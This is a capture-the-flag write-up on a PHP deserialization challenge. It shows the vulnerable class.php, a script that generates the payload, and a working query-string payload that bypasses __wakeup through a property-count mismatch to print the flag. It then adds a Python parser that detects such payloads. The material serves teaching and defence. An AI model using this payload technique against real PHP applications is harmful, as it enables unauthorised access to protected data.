A directory scan finds www.zip.
Requesting /www.zip
downloads the site's install package directly.
First look at the PHP in index.php.
The key point is select: it is a user-controlled variable that ends up in unserialize().
Now look at class.php:
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    // Called automatically by unserialize(): resets username to 'guest'.
    function __wakeup(){
        $this->username = 'guest';
    }
    // Called when the object is destroyed; this is the only place the flag is printed.
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
The class has two properties, username and password, and the constructor writes both.
__wakeup runs automatically during unserialize() and overwrites username with 'guest'.
The flag is printed only if username === 'admin' and password == 100 (the comparison is loose, so the integer 100 works).
Build an object with those values:
<?php
class Name
{
    // Property names and visibility must match class.php exactly;
    // password is the integer 100 so it serializes as i:100.
    private $username = 'admin';
    private $password = 100;
}
$user = new Name();
$str = serialize($user);
//$str = urlencode(serialize($user));  // use this form when the payload goes into a URL
var_dump($str);
?>
Output: string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"
Change the declared property count to 3: as long as it does not match the number of properties actually present, __wakeup is skipped.
The first property name has a declared length of 14 but only 12 characters are visible. The missing two are \0 bytes: PHP prefixes private property names with \0ClassName\0, and these null bytes are invisible in the output.
So add %00 before and after the class name in each property name, and pass the result in select to get the flag:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
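To make the two details above concrete (the \0-mangled private property names, and the property-count mismatch that skips __wakeup), here is an added Python script that is not part of the original writeup or the challenge code. It parses PHP's serialize() format and records the findings a defender would want from a request log: objects whose declared property count differs from the properties actually present, and property names carrying the \0Class\0 or \0*\0 prefixes of private and protected members. The two sample payloads are constructed for the example; the class name and property names are the ones from class.php.

```python
from urllib.parse import unquote

# Constructed sample inputs (not captured traffic): the serialization the
# generator script produces, and the wakeup-bypass variant with the property
# count raised from 2 to 3, as it would arrive URL-encoded in ?select=...
BENIGN = 'O:4:"Name":2:{s:14:"\x00Name\x00username";s:5:"admin";s:14:"\x00Name\x00password";i:100;}'
BYPASS = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}'


class PhpSerializeParser:
    """Minimal parser for PHP's serialize() format (tags N, b, i, d, s, a, O).

    Besides decoding the value it records findings: an object whose declared
    property count differs from the number of properties present (the
    __wakeup bypass), and property names whose \\0Class\\0 or \\0*\\0 prefix
    marks a private or protected member being set from outside.
    """

    def __init__(self, data):
        self.data = data
        self.pos = 0
        self.findings = []

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError("trailing bytes after serialized value")
        return value

    def _expect(self, ch):
        if self.data[self.pos:self.pos + 1] != ch:
            raise ValueError("expected %r at offset %d" % (ch, self.pos))
        self.pos += 1

    def _read_until(self, ch):
        end = self.data.index(ch, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("declared length runs past end of input")
        self.pos += n
        return chunk

    def _value(self):
        tag = self.data[self.pos]
        self.pos += 1
        if tag == 'N':
            self._expect(';')
            return None
        self._expect(':')
        if tag == 'b':
            return self._read_until(';') == '1'
        if tag == 'i':
            return int(self._read_until(';'))
        if tag == 'd':
            return float(self._read_until(';'))
        if tag == 's':
            length = int(self._read_until(':'))
            self._expect('"')
            s = self._take(length)  # length counts the \0 bytes too
            self._expect('"')
            self._expect(';')
            return s
        if tag == 'a':
            return self._members(int(self._read_until(':')), None)
        if tag == 'O':
            name_len = int(self._read_until(':'))
            self._expect('"')
            cls = self._take(name_len)
            self._expect('"')
            self._expect(':')
            declared = int(self._read_until(':'))
            props = self._members(declared, cls)
            return {'__class__': cls, **props}
        raise ValueError("unsupported type tag %r" % tag)

    def _members(self, declared, cls):
        self._expect('{')
        out = {}
        while self.data[self.pos] != '}':
            key = self._value()
            out[key] = self._value()
        self.pos += 1
        if cls is not None:
            if len(out) != declared:
                self.findings.append({'class': cls, 'kind': 'property_count_mismatch',
                                      'declared': declared, 'actual': len(out)})
            for key in out:
                if isinstance(key, str) and key.startswith('\x00'):
                    scope, _, prop = key[1:].partition('\x00')
                    self.findings.append({'class': cls, 'kind': 'non_public_property',
                                          'visibility': 'protected' if scope == '*' else 'private',
                                          'property': prop})
        return out


def inspect_payload(raw):
    """URL-decode a request parameter, parse it, return (value, findings)."""
    parser = PhpSerializeParser(unquote(raw))
    return parser.parse(), parser.findings


if __name__ == '__main__':
    for label, payload in (('benign', BENIGN), ('bypass', BYPASS)):
        value, findings = inspect_payload(payload)
        print(label, value['__class__'], [f['kind'] for f in findings])
```

Run over the bypass payload the parser reports declared 3 versus actual 2 for class Name, which is exactly the condition that makes the challenge's unserialize() skip __wakeup; the benign payload produces only the two private-property findings. Note that the string length check is done in bytes, which is why the 14-byte names with their two null bytes parse correctly even though only 12 characters are printable.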
Reference: https://www.cnblogs.com/junlebao/p/13799762.html